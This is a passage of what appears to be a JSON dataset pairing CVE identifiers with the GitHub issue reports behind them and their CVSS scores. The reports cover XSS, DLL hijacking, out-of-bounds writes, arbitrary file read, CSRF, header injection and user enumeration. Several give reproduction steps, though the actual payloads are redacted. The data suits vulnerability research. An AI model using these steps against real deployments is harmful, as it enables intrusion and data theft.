  89940. "Repo_new": "wolfssl/wolfssl",
  89941. "Issue_Created_At": "2019-01-15T20:11:17Z",
  89942. "description": "heap buffer overflow [tls_bench NUMBERTAG ff NUMBERTAG Hi Team, Summary I have compiled APITAG using clang and a heap based buffer overflow is observed in APITAG System info: APITAG ASAN ERRORTAG",
  89943. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  89944. "severity": "CRITICAL",
  89945. "baseScore": 9.8,
  89946. "impactScore": 5.9,
  89947. "exploitabilityScore": 3.9
  89948. },
  89949. {
  89950. "CVE_ID": "CVE-2019-7328",
  89951. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2449",
  89952. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2449",
  89953. "Repo_new": "zoneminder/zoneminder",
  89954. "Issue_Created_At": "2019-01-24T19:26:47Z",
  89955. "description": "Reflected Cross Site Scripting(XSS) FILETAG NUMBERTAG Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view frame , insecurely prints the scale parameter value on the webpage that is without applying any proper filtration, leading to XSS. To Reproduce Affected URL : URLTAG APITAG \"> APITAG Payload used ERRORTAG Navigate to the Affected URL, Payload would be triggered. Affected source Files: PATHTAG PATHTAG APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
  89956. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  89957. "severity": "MEDIUM",
  89958. "baseScore": 6.1,
  89959. "impactScore": 2.7,
  89960. "exploitabilityScore": 2.8
  89961. },
  89962. {
  89963. "CVE_ID": "CVE-2019-7331",
  89964. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2451",
  89965. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2451",
  89966. "Repo_new": "zoneminder/zoneminder",
  89967. "Issue_Created_At": "2019-01-24T19:40:22Z",
  89968. "description": "Self Stored Cross Site Scripting (XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug A user can edit an existing monitor thereby modifying various misc properties, one of them being signal check color . There exists no input validation & output filtration, leaving it vulnerable to HTML Injection, XSS attack. To Reproduce Affected URL : URLTAG Payload used APITAG Navigate to the Affected URL & modify the Signal check Color field with the provided payload & click on save. Click on the color box, XSS would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
  89969. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  89970. "severity": "MEDIUM",
  89971. "baseScore": 6.1,
  89972. "impactScore": 2.7,
  89973. "exploitabilityScore": 2.8
  89974. },
  89975. {
  89976. "CVE_ID": "CVE-2019-7339",
  89977. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2460",
  89978. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2460",
  89979. "Repo_new": "zoneminder/zoneminder",
  89980. "Issue_Created_At": "2019-01-24T20:29:35Z",
  89981. "description": "POST Reflected Cross Site Scripting(XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The parameter value level , is displayed insecurely, without applying any proper output filtration leading to XSS To Reproduce Affected URL : FILETAG POST Data ERRORTAG Payload used ERRORTAG Navigate to the Affected URL, Payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
  89982. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  89983. "severity": "MEDIUM",
  89984. "baseScore": 6.1,
  89985. "impactScore": 2.7,
  89986. "exploitabilityScore": 2.8
  89987. },
  89988. {
  89989. "CVE_ID": "CVE-2019-9114",
  89990. "Issue_Url_old": "https://github.com/libming/libming/issues/170",
  89991. "Issue_Url_new": "https://github.com/libming/libming/issues/170",
  89992. "Repo_new": "libming/libming",
  89993. "Issue_Created_At": "2019-01-02T06:25:41Z",
  89994. "description": "Out Of Bound Write in function APITAG . An Out Of Bound Write bug was found in function APITAG in decompile.c . Details with asan output is as below: ERRORTAG poc file URLTAG to reproduce it ,run swftocxx with oob_write_decompile NUMBERTAG APITAG credit: APITAG of Venustech",
  89995. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  89996. "severity": "HIGH",
  89997. "baseScore": 8.8,
  89998. "impactScore": 5.9,
  89999. "exploitabilityScore": 2.8
  90000. },
  90001. {
  90002. "CVE_ID": "CVE-2019-9116",
  90003. "Issue_Url_old": "https://github.com/SublimeTextIssues/Core/issues/2544",
  90004. "Issue_Url_new": "https://github.com/sublimehq/sublime_text/issues/2544",
  90005. "Repo_new": "sublimehq/sublime_text",
  90006. "Issue_Created_At": "2019-01-04T08:29:45Z",
  90007. "description": "DLL hijack in Sublime Text NUMBERTAG ersion NUMBERTAG build NUMBERTAG win NUMBERTAG bit. Description Sublime Text NUMBERTAG ersion NUMBERTAG build NUMBERTAG allows local users to gain privileges by creating a PATHTAG folder and then copying a Trojan horse api ms win core fibers l NUMBERTAG dll or api ms win core localization l NUMBERTAG dll file into this new folder, then creating FILETAG and opening it with FILETAG aka DLL Hijacking Steps to reproduce NUMBERTAG First step Create a new PATHTAG folder and then create a file named FILETAG in this folder NUMBERTAG Second step Copy a Trojan horse api ms win core fibers l NUMBERTAG dll or api ms win core localization l NUMBERTAG dll file into sublime_text folder NUMBERTAG Third step Open FILETAG by using FILETAG Expected behavior Load the FILETAG when open the FILETAG Actual behavior Load the FILETAG when open the FILETAG Environment Operating system and version: Windows NUMBERTAG APITAG NUMBERTAG Service Pack NUMBERTAG Sublime Text: Build NUMBERTAG bit",
  90008. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  90009. "severity": "HIGH",
  90010. "baseScore": 7.8,
  90011. "impactScore": 5.9,
  90012. "exploitabilityScore": 1.8
  90013. },
  90014. {
  90015. "CVE_ID": "CVE-2020-12723",
  90016. "Issue_Url_old": "https://github.com/Perl/perl5/issues/16947",
  90017. "Issue_Url_new": "https://github.com/perl/perl5/issues/16947",
  90018. "Repo_new": "perl/perl5",
  90019. "Issue_Created_At": "2019-04-10T13:09:22Z",
  90020. "description": "Segfault in S_study_chunk APITAG Migrated from rt.perl.org NUMBERTAG URLTAG (status was 'open') Searchable as RT NUMBERTAG",
  90021. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  90022. "severity": "HIGH",
  90023. "baseScore": 7.5,
  90024. "impactScore": 3.6,
  90025. "exploitabilityScore": 3.9
  90026. },
  90027. {
  90028. "CVE_ID": "CVE-2020-12723",
  90029. "Issue_Url_old": "https://github.com/Perl/perl5/issues/17743",
  90030. "Issue_Url_new": "https://github.com/perl/perl5/issues/17743",
  90031. "Repo_new": "perl/perl5",
  90032. "Issue_Created_At": "2020-04-23T13:10:14Z",
  90033. "description": "study_chunk recursion. This is a placeholder ticket for consideration of a theoretically possible bug. In NUMBERTAG we found that study_chunk reinvokes itself in two ways by simple recursion, and by enframing. In some cases that involves restudying regexp ops multiple times, whereas in other cases the reinvocation is the only time the relevant ops are studied. The primary results of studying are a) to capture global information about the regexp that will be used for optimization at runtime; b) to make in place modifications to the ops for optimization (optional but desirable); and c) to make mandatory modifications to the ops, replacing temporary compile time only ops that the runtime engine does not know how to handle. Because of (c) it is required that every op is studied at least once. When ops are studied multiple times that can cause problems: the first invocation may capture information about the program, then reinvoke, then attempt to use the captured information assuming it has not changed. The conclusion is that mutation of ops must happen only once, at the outermost level of reinvocation that will act on the relevant ops. As far as I was able to discover the only case in which ops are studied multiple times is in the handling of GOSUB, which reinvokes by enframing. In NUMBERTAG this was resolved by recording in each frame whether it, or any outer frame, represented the handling of a GOSUB, and suppressing all mutating changes if so (confident that the same ops will be studied at some point in some outer frame that is not within the handling of a GOSUB). When we reinvoke by recursion, however, any frames used by the caller are not visible to the callee; as such it may still be possible to trigger the same types of problem if reinvocation involves a mix of enframing and recursion. Extending the fix from NUMBERTAG ad NUMBERTAG d3f to handle this case would involve adding an extra boolean argument APITAG to study_chunk. All principal calls would pass this in as NUMBERTAG all recursive calls would pass in the local value of APITAG ; and the setting of APITAG would change to: APITAG I don't intend to make such a change unless we find a testcase to show this is a real rather than a theoretical problem.",
  90034. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  90035. "severity": "HIGH",
  90036. "baseScore": 7.5,
  90037. "impactScore": 3.6,
  90038. "exploitabilityScore": 3.9
  90039. },
  90040. {
  90041. "CVE_ID": "CVE-2020-14156",
  90042. "Issue_Url_old": "https://github.com/openbmc/openbmc/issues/3670",
  90043. "Issue_Url_new": "https://github.com/openbmc/openbmc/issues/3670",
  90044. "Repo_new": "openbmc/openbmc",
  90045. "Issue_Created_At": "2020-06-15T14:49:16Z",
  90046. "description": "Reserved for bug report.",
  90047. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  90048. "severity": "HIGH",
  90049. "baseScore": 8.8,
  90050. "impactScore": 5.9,
  90051. "exploitabilityScore": 2.8
  90052. },
  90053. {
  90054. "CVE_ID": "CVE-2020-14160",
  90055. "Issue_Url_old": "https://github.com/gotenberg/gotenberg/issues/215",
  90056. "Issue_Url_new": "https://github.com/gotenberg/gotenberg/issues/215",
  90057. "Repo_new": "gotenberg/gotenberg",
  90058. "Issue_Created_At": "2020-06-15T18:02:03Z",
  90059. "description": "Vulnerabilities. Hi, I've identified NUMBERTAG high/critical severity vulnerabilities in Gotenberg that can potentially lead to RCE in the Docker container. These are different than the ones identified in URLTAG URLTAG . I've sent the details through email already on the provided PGP key in that existing issue. Thanks, APITAG",
  90060. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  90061. "severity": "HIGH",
  90062. "baseScore": 7.5,
  90063. "impactScore": 3.6,
  90064. "exploitabilityScore": 3.9
  90065. },
  90066. {
  90067. "CVE_ID": "CVE-2020-15953",
  90068. "Issue_Url_old": "https://github.com/dinhvh/libetpan/issues/386",
  90069. "Issue_Url_new": "https://github.com/dinhvh/libetpan/issues/386",
  90070. "Repo_new": "dinhvh/libetpan",
  90071. "Issue_Created_At": "2020-06-18T12:09:50Z",
  90072. "description": "Buffering issues with STARTTLS in IMAP. We found a STARTTLS issue in APITAG which affects IMAP (and probably other protocols.) When the server responds with its \"let's do TLS now message\", e.g. APITAG , APITAG will read any data after the and save it into some internal buffer for later processing. This is problematic, because a MITM attacker can inject arbitrary responses. I havn't tested it to this extent, but I suspect that this is enough to forge entire mailboxes even though STARTTLS is used. There is a nice blogpost by Wietse Venema about a \"command injection\" in postfix ( URLTAG What we have here is the problem in reverse, i.e. not a command injection, but a \"response injection.\" Example trace to give an intuition: CODETAG An attacker can probably inject more responses and (in the worst case) mimic a whole session. There are (from my view) three possible fixes NUMBERTAG discard any remaining data after stls NUMBERTAG shovel the extra data into the TLS layer (where it belongs), and NUMBERTAG error out as this is clearly a protocol violation. The (maybe silly or even wrong) commit in URLTAG seems to fix the issue (please ignore the .idea folder :P)",
  90073. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
  90074. "severity": "HIGH",
  90075. "baseScore": 7.4,
  90076. "impactScore": 5.2,
  90077. "exploitabilityScore": 2.2
  90078. },
  90079. {
  90080. "CVE_ID": "CVE-2020-16587",
  90081. "Issue_Url_old": "https://github.com/AcademySoftwareFoundation/openexr/issues/491",
  90082. "Issue_Url_new": "https://github.com/academysoftwarefoundation/openexr/issues/491",
  90083. "Repo_new": "academysoftwarefoundation/openexr",
  90084. "Issue_Created_At": "2019-07-24T15:34:32Z",
  90085. "description": "SEGV exrheader in APITAG Hi, I found a crash due to a heap buffer overflow bug on exrheader (the latest commit APITAG on master). APITAG URLTAG Command: exrheader APITAG ASAN says NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG ec NUMBERTAG at pc NUMBERTAG f NUMBERTAG af NUMBERTAG f NUMBERTAG f bp NUMBERTAG ffc0b8eb5e0 sp NUMBERTAG ffc0b8eb5d0 READ of size NUMBERTAG at NUMBERTAG ec NUMBERTAG thread T NUMBERTAG f NUMBERTAG af NUMBERTAG f NUMBERTAG e in APITAG APITAG , APITAG > > const&) PATHTAG NUMBERTAG f NUMBERTAG af NUMBERTAG fee0 in APITAG PATHTAG NUMBERTAG f NUMBERTAG af NUMBERTAG f in APITAG PATHTAG NUMBERTAG f NUMBERTAG af NUMBERTAG bb in APITAG const , int, bool) PATHTAG NUMBERTAG ERRORTAG NUMBERTAG d8 in APITAG const ) PATHTAG NUMBERTAG eb in main PATHTAG NUMBERTAG f NUMBERTAG aea NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG NUMBERTAG ec NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f NUMBERTAG afa NUMBERTAG in operator new(unsigned long) ( PATHTAG NUMBERTAG f NUMBERTAG af NUMBERTAG de in APITAG >::allocate(unsigned long, void const ) PATHTAG NUMBERTAG f NUMBERTAG af NUMBERTAG de in APITAG > APITAG >&, unsigned long) PATHTAG NUMBERTAG f NUMBERTAG af NUMBERTAG de in APITAG , APITAG > >::_M_allocate(unsigned long) PATHTAG NUMBERTAG f NUMBERTAG af NUMBERTAG de in void APITAG , APITAG > APITAG APITAG &&) PATHTAG NUMBERTAG f NUMBERTAG af NUMBERTAG de in void APITAG , APITAG > APITAG APITAG &&) PATHTAG NUMBERTAG f NUMBERTAG af NUMBERTAG de in APITAG , APITAG > APITAG &&) PATHTAG NUMBERTAG f NUMBERTAG af NUMBERTAG de in APITAG PATHTAG ~~~ Thanks, Manh Dung",
  90086. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  90087. "severity": "MEDIUM",
  90088. "baseScore": 5.5,
  90089. "impactScore": 3.6,
  90090. "exploitabilityScore": 1.8
  90091. },
  90092. {
  90093. "CVE_ID": "CVE-2020-16588",
  90094. "Issue_Url_old": "https://github.com/AcademySoftwareFoundation/openexr/issues/493",
  90095. "Issue_Url_new": "https://github.com/academysoftwarefoundation/openexr/issues/493",
  90096. "Repo_new": "academysoftwarefoundation/openexr",
  90097. "Issue_Created_At": "2019-07-24T15:47:58Z",
  90098. "description": "SEGV exrmakepreview in APITAG Hi, I found a null pointer dereference bug on exrmakepreview (the latest commit NUMBERTAG on master). APITAG URLTAG Command: exrmakepreview v APITAG /dev/null ASAN says NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG db3 bp NUMBERTAG fbf NUMBERTAG cd NUMBERTAG sp NUMBERTAG ffe NUMBERTAG fc NUMBERTAG T NUMBERTAG db2 in APITAG PATHTAG NUMBERTAG db2 in APITAG const , char const , int, float, bool) PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG fbf NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG ) ~~~ Thanks, Manh Dung",
  90099. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  90100. "severity": "MEDIUM",
  90101. "baseScore": 5.5,
  90102. "impactScore": 3.6,
  90103. "exploitabilityScore": 1.8
  90104. },
  90105. {
  90106. "CVE_ID": "CVE-2020-16589",
  90107. "Issue_Url_old": "https://github.com/AcademySoftwareFoundation/openexr/issues/494",
  90108. "Issue_Url_new": "https://github.com/academysoftwarefoundation/openexr/issues/494",
  90109. "Repo_new": "academysoftwarefoundation/openexr",
  90110. "Issue_Created_At": "2019-07-24T15:48:18Z",
  90111. "description": "SEGV exrmakepreview in APITAG Hi, I found a crash due to a heap buffer overflow bug on exrmakepreview (the latest commit NUMBERTAG on master). APITAG URLTAG Command: exrmakepreview v APITAG /dev/null ASAN says NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG e NUMBERTAG at pc NUMBERTAG f2f NUMBERTAG c NUMBERTAG a bp NUMBERTAG ffe NUMBERTAG e NUMBERTAG sp NUMBERTAG ffe NUMBERTAG e NUMBERTAG READ of size NUMBERTAG at NUMBERTAG e NUMBERTAG thread T NUMBERTAG f2f NUMBERTAG c NUMBERTAG in APITAG int, int, int) ( PATHTAG NUMBERTAG f2f NUMBERTAG a8eac in APITAG PATHTAG NUMBERTAG f2f NUMBERTAG ae NUMBERTAG in APITAG PATHTAG NUMBERTAG b in APITAG const , char const , int, float, bool) PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f2f NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG ) ~~~ Thanks, Manh Dung",
  90112. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  90113. "severity": "MEDIUM",
  90114. "baseScore": 5.5,
  90115. "impactScore": 3.6,
  90116. "exploitabilityScore": 1.8
  90117. },
  90118. {
  90119. "CVE_ID": "CVE-2020-18878",
  90120. "Issue_Url_old": "https://github.com/zorlan/skycaiji/issues/13",
  90121. "Issue_Url_new": "https://github.com/zorlan/skycaiji/issues/13",
  90122. "Repo_new": "zorlan/skycaiji",
  90123. "Issue_Created_At": "2018-09-13T07:25:24Z",
  90124. "description": "Skycaiji cms has an arbitrary file read vulnerability at NUMBERTAG I found an arbitrary file read vulnerability at NUMBERTAG In the module of error log URL: FILETAG The parameter of file can control\uff0cfor example read FILETAG POC: APITAG suggest\uff1alimit the parameter of file Info NUMBERTAG I hope you can fix it Best wish! author by:xijun. EMAILTAG",
  90125. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  90126. "severity": "MEDIUM",
  90127. "baseScore": 5.3,
  90128. "impactScore": 1.4,
  90129. "exploitabilityScore": 3.9
  90130. },
  90131. {
  90132. "CVE_ID": "CVE-2020-19492",
  90133. "Issue_Url_old": "https://github.com/pts/sam2p/issues/66",
  90134. "Issue_Url_new": "https://github.com/pts/sam2p/issues/66",
  90135. "Repo_new": "pts/sam2p",
  90136. "Issue_Created_At": "2019-07-18T11:14:43Z",
  90137. "description": "Floating point exception. Hi, I found a FPE bug on the latest commit APITAG of master. APITAG URLTAG Command: sam2p APITAG FILETAG ASAN says: ~~~ This is sam2p NUMBERTAG Available Loaders: PS PDF JAI PNG JPEG TIFF PNM BMP GIF LBM XPM PCX TGA. Available Appliers: XWD Meta Empty BMP PNG TIFF6 TIFF6 JAI JPEG JAI JPEG PNM GIF NUMBERTAG a+LZW XPM PSL1C PSL NUMBERTAG PDF PSL2+PDF JAI P APITAG sam2p asan: Warning: TGA NUMBERTAG bit image NUMBERTAG bit alpha is greater than NUMBERTAG total bits per pixel sam2p asan: Warning: TGA: reducing to bit alpha NUMBERTAG Floating point exception ~~~ Thanks, Manh Dung",
  90138. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  90139. "severity": "HIGH",
  90140. "baseScore": 7.8,
  90141. "impactScore": 5.9,
  90142. "exploitabilityScore": 1.8
  90143. },
  90144. {
  90145. "CVE_ID": "CVE-2020-22783",
  90146. "Issue_Url_old": "https://github.com/ether/etherpad-lite/issues/3421",
  90147. "Issue_Url_new": "https://github.com/ether/etherpad-lite/issues/3421",
  90148. "Repo_new": "ether/etherpad-lite",
  90149. "Issue_Created_At": "2018-07-10T11:27:48Z",
  90150. "description": "plain text password in the database. I can see my admin password in plain text in the database. CODETAG That must not happen NUMBERTAG",
  90151. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  90152. "severity": "MEDIUM",
  90153. "baseScore": 6.5,
  90154. "impactScore": 3.6,
  90155. "exploitabilityScore": 2.8
  90156. },
  90157. {
  90158. "CVE_ID": "CVE-2020-23349",
  90159. "Issue_Url_old": "https://github.com/sinaweibosdk/weibo_android_sdk/issues/406",
  90160. "Issue_Url_new": "https://github.com/sinaweibosdk/weibo_android_sdk/issues/406",
  90161. "Repo_new": "sinaweibosdk/weibo_android_sdk",
  90162. "Issue_Created_At": "2018-11-08T01:23:12Z",
  90163. "description": "\u65b0\u6d6a\u5fae\u535a\u8d77\u8c03\u79c1\u6709\u7ec4\u4ef6. APITAG sso NUMBERTAG",
  90164. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  90165. "severity": "HIGH",
  90166. "baseScore": 7.5,
  90167. "impactScore": 3.6,
  90168. "exploitabilityScore": 3.9
  90169. },
  90170. {
  90171. "CVE_ID": "CVE-2020-25635",
  90172. "Issue_Url_old": "https://github.com/ansible-collections/community.aws/issues/222",
  90173. "Issue_Url_new": "https://github.com/ansible-collections/community.aws/issues/222",
  90174. "Repo_new": "ansible-collections/community.aws",
  90175. "Issue_Created_At": "2020-09-04T15:25:10Z",
  90176. "description": "aws_ssm connection plugin should garbage collect the s3 bucket after the file transfers. SUMMARY The aws_ssm connection plugin uses an s3 buckets to transfer files to instances. These files remain in the bucket after the play has complete, they are never removed. ISSUE TYPE Bug Report COMPONENT NAME aws_ssm connection plugin ANSIBLE VERSION ansible NUMBERTAG rc2 config file = PATHTAG configured module search path = PATHTAG PATHTAG ansible python module location = PATHTAG executable location = PATHTAG python version NUMBERTAG default, Jul NUMBERTAG GCC NUMBERTAG CONFIGURATION n/a OS / ENVIRONMENT debian NUMBERTAG STEPS TO REPRODUCE NUMBERTAG use the aws_ssm plugin NUMBERTAG look at the s3 bucket it used NUMBERTAG observe that the files are transferred are still there EXPECTED RESULTS The plugin should garbage collect files after transferring them. ACTUAL RESULTS Files written remain there forever.",
  90177. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  90178. "severity": "MEDIUM",
  90179. "baseScore": 5.5,
  90180. "impactScore": 3.6,
  90181. "exploitabilityScore": 1.8
  90182. },
  90183. {
  90184. "CVE_ID": "CVE-2020-28723",
  90185. "Issue_Url_old": "https://github.com/CloudAvid/PParam/issues/9",
  90186. "Issue_Url_new": "https://github.com/cloudavid/pparam/issues/9",
  90187. "Repo_new": "cloudavid/pparam",
  90188. "Issue_Created_At": "2019-04-11T09:57:05Z",
  90189. "description": "Memory Leak in libpparam. Hi MENTIONTAG , I fuzz libparam and found two memory leak, source fuzz : URLTAG crash : URLTAG Thanks, Ramin",
  90190. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  90191. "severity": "HIGH",
  90192. "baseScore": 7.5,
  90193. "impactScore": 3.6,
  90194. "exploitabilityScore": 3.9
  90195. },
  90196. {
  90197. "CVE_ID": "CVE-2020-28724",
  90198. "Issue_Url_old": "https://github.com/pallets/werkzeug/issues/822",
  90199. "Issue_Url_new": "https://github.com/pallets/werkzeug/issues/822",
  90200. "Repo_new": "pallets/werkzeug",
  90201. "Issue_Created_At": "2015-12-06T11:54:40Z",
  90202. "description": "dev server sets wrong HTTP_HOST when path starts with a double slash. See URLTAG if APITAG environ['HTTP_HOST'] = APITAG This code was added in NUMBERTAG d NUMBERTAG Do absolute http requests even make sense except for HTTP proxies?",
  90203. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  90204. "severity": "MEDIUM",
  90205. "baseScore": 6.1,
  90206. "impactScore": 2.7,
  90207. "exploitabilityScore": 2.8
  90208. },
  90209. {
  90210. "CVE_ID": "CVE-2020-29668",
  90211. "Issue_Url_old": "https://github.com/sympa-community/sympa/issues/1041",
  90212. "Issue_Url_new": "https://github.com/sympa-community/sympa/issues/1041",
  90213. "Repo_new": "sympa-community/sympa",
  90214. "Issue_Created_At": "2020-11-24T10:54:27Z",
  90215. "description": "Unauthorised full access via SOAP API due to illegal cookie. Version NUMBERTAG el7 on Centos NUMBERTAG Installation method Centos package Expected behavior permission denied Actual behavior error message and action actually executed anyways. Additional information In our setup we have a problem with incorrect cookies via the SOAP API of sympa. If the SOAP request contains a correct cookie everything works as expected > request executed If the SOAP request contains a correct but outdated cookie, everything works as expected > request correctly denied. If the SOAP request contains an arbitrary string as cookie (e.g. \"asdkjasdljkahsdlkjh\"), SOAP replies with an error APITAG session ID in cookie\") but STILL executes every requests we make. By this we can add email adresses to lists without authentication, any operation we tried was still successful. We could hotfix the problem by inserting a APITAG command into PATHTAG like this: ERRORTAG",
  90216. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
  90217. "severity": "LOW",
  90218. "baseScore": 3.7,
  90219. "impactScore": 1.4,
  90220. "exploitabilityScore": 2.2
  90221. },
  90222. {
  90223. "CVE_ID": "CVE-2020-35669",
  90224. "Issue_Url_old": "https://github.com/dart-lang/http/issues/511",
  90225. "Issue_Url_new": "https://github.com/dart-lang/http/issues/511",
  90226. "Repo_new": "dart-lang/http",
  90227. "Issue_Created_At": "2020-12-23T11:07:32Z",
  90228. "description": "Header injection and path forgery security issue]. I believe there is a security issue with the current implementation of Request . The full example can be found [here URLTAG What's wrong: Request is passing method verb as is to the stream without any kind of validation. basically: CODETAG generates request like: CODETAG What I'd expect If HTTP verb(method) is not a part of the known set of verbs ( PATHTAG ) I'd expect an exception to be thrown Why this is a security risk If the developer is using Request to abstract generating HTTP calls and he's accepting a method param from the user, the user can do some magic like header injection or path forgery. This can be exploited in many ways and seems to be quite important especially in case there is a reverse proxy is in place . A proxy may just pass someone's request to any host. By running snippet URLTAG behind a proxy, I was nicely redirected( like this URLTAG to APITAG which was injected as per the example above. Let's assume I'm replacing APITAG with APITAG and the victim is working in a company behind the proxy. This means I can redirect calls with headers/cookies(tokens) and blah blah blah.",
  90229. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  90230. "severity": "MEDIUM",
  90231. "baseScore": 6.1,
  90232. "impactScore": 2.7,
  90233. "exploitabilityScore": 2.8
  90234. },
  90235. {
  90236. "CVE_ID": "CVE-2020-35687",
  90237. "Issue_Url_old": "https://github.com/PHPFusion/PHPFusion/issues/2347",
  90238. "Issue_Url_new": "https://github.com/phpfusion/phpfusion/issues/2347",
  90239. "Repo_new": "phpfusion/phpfusion",
  90240. "Issue_Created_At": "2020-12-21T16:21:03Z",
  90241. "description": "CSRF attack leads to deletion of shoutbox messages. Describe the bug PHP Fusion version NUMBERTAG is vulnerable to CSRF attack which leads to deletion of shoutbox messages by the attacker on behalf of the logged in victim.. Version PHP Fusion version NUMBERTAG To Reproduce Steps to reproduce the behavior NUMBERTAG Go to ' FILETAG NUMBERTAG Login using Demo credentials NUMBERTAG Create any random shoutbox message post logging into the application NUMBERTAG Now create an HTML form which performs the expected operation of deleting the shoutbox message. The one like below. CODETAG NUMBERTAG Save the above code as html NUMBERTAG Now, re login into the application NUMBERTAG Open the above html file in the same browser in which we are logged in NUMBERTAG Click on submit request and observe the shoutbox message gets deleted NUMBERTAG The attacker can change shout_id to different value and observe that all the shoutbox messages of the logged in user can be deleted. Expected behavior NUMBERTAG Implement an anti CSRF token which is random and changes/destroys after it is used once NUMBERTAG Include this anti CSRF token it in the POST body whenever the user deletes/performs any state changing requests. Screenshots FILETAG",
  90242. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
  90243. "severity": "MEDIUM",
  90244. "baseScore": 4.3,
  90245. "impactScore": 1.4,
  90246. "exploitabilityScore": 2.8
  90247. },
  90248. {
  90249. "CVE_ID": "CVE-2020-35728",
  90250. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2999",
  90251. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2999",
  90252. "Repo_new": "fasterxml/jackson-databind",
  90253. "Issue_Created_At": "2020-12-23T04:30:19Z",
  90254. "description": "Block NUMBERTAG more gadget types (placeholder) . (note: placeholder until issue verified) Another gadget type(s) reported regarding class(es) of (withhold until fixed). library. See URLTAG for description of the general problem. Reporter(s): bu5yer (of Sangfor APITAG Security Lab) Mitre id: (to be allocated) Fix will be included in NUMBERTAG usable via APITAG version ) Not considered valid CVE for Jackson NUMBERTAG and later (see URLTAG",
  90255. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  90256. "severity": "HIGH",
  90257. "baseScore": 8.1,
  90258. "impactScore": 5.9,
  90259. "exploitabilityScore": 2.2
  90260. },
  90261. {
  90262. "CVE_ID": "CVE-2020-35952",
  90263. "Issue_Url_old": "https://github.com/PHPFusion/PHPFusion/issues/2346",
  90264. "Issue_Url_new": "https://github.com/phpfusion/phpfusion/issues/2346",
  90265. "Repo_new": "phpfusion/phpfusion",
  90266. "Issue_Created_At": "2020-12-21T15:40:10Z",
  90267. "description": "User Enumeration in Sign in page. Describe the bug It was observed that the login page of the php fusion throwed different messages upon different username entries. This shows that the product is vulnerable to user enumeration vulnerability. Version PHP Fusion latest version NUMBERTAG To Reproduce Steps to reproduce the behavior NUMBERTAG Go to ' FILETAG NUMBERTAG Login using valid credentials NUMBERTAG Add a new user NUMBERTAG Now open a separate private tab, access the URL: FILETAG NUMBERTAG Try logging in with username that we created with wrong password, Observe the product throws message APITAG valid Password NUMBERTAG Now, try logging in with wrong/non existing username and password. Observe the application throws different message NUMBERTAG This difference in error message leads an attacker to collect valid usernames which can ease brute forcing or logging in attempt. Expected behavior Display a common message for any combination of wrong username/password. Screenshots FILETAG FILETAG",
